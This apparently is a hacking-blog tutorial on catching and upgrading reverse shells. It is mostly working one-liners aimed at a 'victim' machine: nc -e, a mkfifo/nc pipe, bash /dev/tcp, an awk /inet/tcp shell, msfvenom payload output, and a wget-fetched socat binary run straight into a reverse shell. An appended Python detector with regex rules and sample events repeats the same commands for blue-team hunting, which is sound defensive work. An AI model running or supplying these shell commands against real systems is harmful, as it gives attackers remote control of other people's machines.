Do you know that moment when you got your beloved reverse shell but you don't have all the bells and whistles of a full TTY shell? The time when you hit "Ctrl-C" and boom... you exit and kill the connection? And that's without even talking about su, ssh, vim and so on...
Then, it’s time to upgrade it!
Just to recap the basics for a reverse shell:
# on your box
nc -lvnp <your_port>
# on your victim you send
nc -e /bin/bash <your_ip> <your_port>
But what happens if the "-e" option isn't available?
Well... there's a way, but we will cover it in another post.
Option #1 - Python pty
As simple as typing the line below. We still miss Ctrl-C, autocompletion, history etc., but it's a starting point from which to jump to the stty options:
python -c 'import pty; pty.spawn("/bin/bash")'
But we have something more to do for a better user experience. The trick is to put your local terminal into raw mode (stty raw -echo) so that keystrokes such as Ctrl-C are passed through to the remote pty instead of being handled by your own shell, and to turn local echo off since the remote pty now echoes for you:
# on your victim
CTRL+Z
# now you are on your machine
$ stty raw -echo
$ fg
# now you are in your victim
$ reset
$ export SHELL=bash
$ export TERM=xterm
$ stty rows <num> columns <cols>
# --> ENJOY <-- #
How can you know which rows and columns to use?
Well... just take them from your machine:
$ stty -a
speed 38400 baud; rows 50; columns 198; line = 0;
Option #2 - Oneliner msfvenom
Metasploit has many payloads that can be used for a one-liner reverse shell:
msfvenom -l payloads | grep "cmd/unix" | awk '{print $1}'
cmd/unix/bind_awk
cmd/unix/bind_busybox_telnetd
cmd/unix/bind_inetd
cmd/unix/bind_jjs
cmd/unix/bind_lua
cmd/unix/bind_netcat
cmd/unix/bind_netcat_gaping
cmd/unix/bind_netcat_gaping_ipv6
cmd/unix/bind_nodejs
cmd/unix/bind_perl
cmd/unix/bind_perl_ipv6
cmd/unix/bind_r
cmd/unix/bind_ruby
cmd/unix/bind_ruby_ipv6
cmd/unix/bind_socat_udp
cmd/unix/bind_stub
cmd/unix/bind_zsh
cmd/unix/generic
cmd/unix/interact
cmd/unix/pingback_bind
cmd/unix/pingback_reverse
cmd/unix/reverse
cmd/unix/reverse_awk
cmd/unix/reverse_bash
cmd/unix/reverse_bash_telnet_ssl
cmd/unix/reverse_bash_udp
cmd/unix/reverse_jjs
cmd/unix/reverse_ksh
cmd/unix/reverse_lua
cmd/unix/reverse_ncat_ssl
cmd/unix/reverse_netcat
cmd/unix/reverse_netcat_gaping
cmd/unix/reverse_nodejs
cmd/unix/reverse_openssl
cmd/unix/reverse_perl
cmd/unix/reverse_perl_ssl
cmd/unix/reverse_php_ssl
cmd/unix/reverse_python
cmd/unix/reverse_python_ssl
cmd/unix/reverse_r
cmd/unix/reverse_ruby
cmd/unix/reverse_ruby_ssl
cmd/unix/reverse_socat_udp
cmd/unix/reverse_ssh
cmd/unix/reverse_ssl_double_telnet
cmd/unix/reverse_stub
cmd/unix/reverse_tclsh
cmd/unix/reverse_zsh
You can use any of those options to create your reverse shell. Let's see some examples:
--> msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.1 LPORT=1337
mkfifo /tmp/ixvn; nc 10.0.0.1 1337 0</tmp/ixvn | /bin/sh >/tmp/ixvn 2>&1; rm /tmp/ixvn
--> msfvenom -p cmd/unix/reverse_bash LHOST=10.0.0.1 LPORT=1337
0<&113-;exec 113<>/dev/tcp/10.0.0.1/1337;sh <&113 >&113 2>&113
--> msfvenom -p cmd/unix/reverse_awk LHOST=10.0.0.1 LPORT=1337
awk 'BEGIN{s="/inet/tcp/0/10.0.0.1/1337";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}'
Option #3 - Socat
If you are lucky enough to have socat installed on your victim machine:
# on your box start a listener
socat file:`tty`,raw,echo=0 tcp-listen:<your_port>
# on your victim
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<your_ip>:<your_port>
But if you don't have it handy on the victim box, you are not at a dead end: you can always drop in a static binary and use it the way you prefer.
https://github.com/andrew-d/static-binaries
Use it like in this example:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1337
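Every technique in this post (the nc -e shell, the python pty.spawn upgrade, the mkfifo/nc pipe, bash's /dev/tcp, awk's /inet/tcp and the socat exec:...,pty one-liner) leaves a very recognisable command line in process-execution telemetry, which is what a blue team would hunt for. As an added example that is not part of the original post, here is a small Python detector that runs one rule per technique over constructed process-execution records. The event field names (pid, user, cmdline), the rule names and the sample events are all assumptions; adapt the field names to whatever your auditd or EDR export actually emits.

```python
import re

# Constructed process-execution records (not real telemetry). Field names are an
# assumption; adapt them to whatever your auditd/EDR export actually emits.
SAMPLE_EVENTS = [
    {"pid": 4242, "user": "www-data",
     "cmdline": "nc -e /bin/bash 10.0.0.1 1337"},
    {"pid": 4243, "user": "www-data",
     "cmdline": "python -c 'import pty; pty.spawn(\"/bin/bash\")'"},
    {"pid": 4244, "user": "www-data",
     "cmdline": "sh -c 'mkfifo /tmp/ixvn; nc 10.0.0.1 1337 0</tmp/ixvn | /bin/sh >/tmp/ixvn 2>&1; rm /tmp/ixvn'"},
    {"pid": 4245, "user": "www-data",
     "cmdline": "bash -c '0<&113-;exec 113<>/dev/tcp/10.0.0.1/1337;sh <&113 >&113 2>&113'"},
    {"pid": 4246, "user": "www-data",
     "cmdline": "awk 'BEGIN{s=\"/inet/tcp/0/10.0.0.1/1337\";while(1){do{s|&getline c;"
                "if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!=\"exit\");close(s)}}'"},
    {"pid": 4247, "user": "www-data",
     "cmdline": "/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1337"},
    # Benign look-alikes that must not alert.
    {"pid": 4248, "user": "alice", "cmdline": "python -c 'import json; print(json.dumps({}))'"},
    {"pid": 4249, "user": "root", "cmdline": "nc -z localhost 22"},
    {"pid": 4250, "user": "alice", "cmdline": "vim notes.txt"},
]

# One rule per technique shown in the post. Rule names are ours (assumed, not a standard taxonomy).
NC = r"\bn(?:c|cat|etcat)\b"          # nc / ncat / netcat
RULES = [
    ("netcat_exec_shell",  re.compile(NC + r".*\s-e\s+\S*sh\b")),
    ("python_pty_spawn",   re.compile(r"\bpty\.spawn\(")),
    ("mkfifo_netcat_pipe", re.compile(r"\bmkfifo\b.*" + NC + r".*\|\s*\S*sh\b")),
    ("bash_dev_tcp",       re.compile(r"/dev/(?:tcp|udp)/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("awk_inet_tcp",       re.compile(r"\bawk\b.*/inet/tcp/")),
    ("socat_exec_pty",     re.compile(r"\bsocat\b.*\bexec:.*\bpty\b")),
]

# "IP PORT", "IP/PORT" or "IP:PORT", the three spellings used by the one-liners above.
DEST_RE = re.compile(r"(?<!\d)(\d{1,3}(?:\.\d{1,3}){3})[/: ]+(\d{1,5})\b")


def scan_event(event):
    """Return the names of every rule whose pattern matches the event's command line."""
    return [name for name, rx in RULES if rx.search(event["cmdline"])]


def extract_destination(cmdline):
    """Best-effort (ip, port) of the callback target, or None if none is visible."""
    m = DEST_RE.search(cmdline)
    return (m.group(1), int(m.group(2))) if m else None


def scan_events(events):
    """Turn matching events into alert dicts; events matching no rule are dropped."""
    alerts = []
    for ev in events:
        hits = scan_event(ev)
        if hits:
            alerts.append({
                "pid": ev["pid"],
                "user": ev["user"],
                "rules": hits,
                "destination": extract_destination(ev["cmdline"]),
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert)
```

The rules deliberately key on the structural tells (a shell handed to nc's -e, a pipe from a FIFO into a shell, a /dev/tcp redirection, an exec: address combined with pty) rather than on the exact strings msfvenom emitted, so renaming /tmp/ixvn or changing the port does not evade them, while the plain "nc -z" port check and the unrelated python one-liner stay quiet. The extracted destination is what you would pivot on next in network logs.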